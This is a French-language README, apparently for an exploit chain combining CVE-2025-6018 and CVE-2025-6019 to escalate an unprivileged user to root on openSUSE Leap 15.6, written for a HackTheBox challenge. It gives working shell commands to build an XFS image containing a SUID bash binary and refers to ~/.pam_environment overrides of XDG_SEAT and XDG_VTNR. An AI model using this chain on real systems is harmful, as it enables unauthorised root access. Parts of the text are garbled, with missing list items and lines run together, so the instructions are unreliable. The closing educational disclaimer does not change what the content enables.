
Chaîne d'exploitation d'élévation de privilèges (CVE-2025-6018 + CVE-2025-6019) pour openSUSE Leap 15.6
Cet exploit a été développé pour résoudre un défi HackTheBox ciblant openSUSE Leap 15.6.
Cet exploit est basé sur les recherches originales de l'équipe de sécurité Qualys :
Implémentation de référence supplémentaire :
Cet exploit enchaîne deux vulnérabilités pour réaliser une élévation de privilèges locale d'un utilisateur non privilégié jusqu'à root sur openSUSE Leap 15.6 :
L'exploit nécessite une image de système de fichiers XFS pré-créée contenant un binaire bash SUID. Elle doit être créée sur une machine Linux où vous disposez des privilèges root :
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
Vérifiez que l'image a été créée correctement :
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment avec des surcharges XDG_SEAT et XDG_VTNRSi l'exploit échoue :
file xfs.imagesystemctl status udisks2Cet exploit est destiné uniquement à des fins éducatives et à des tests de sécurité autorisés. Utilisez-le de manière responsable et uniquement sur des systèmes que vous avez la permission de tester.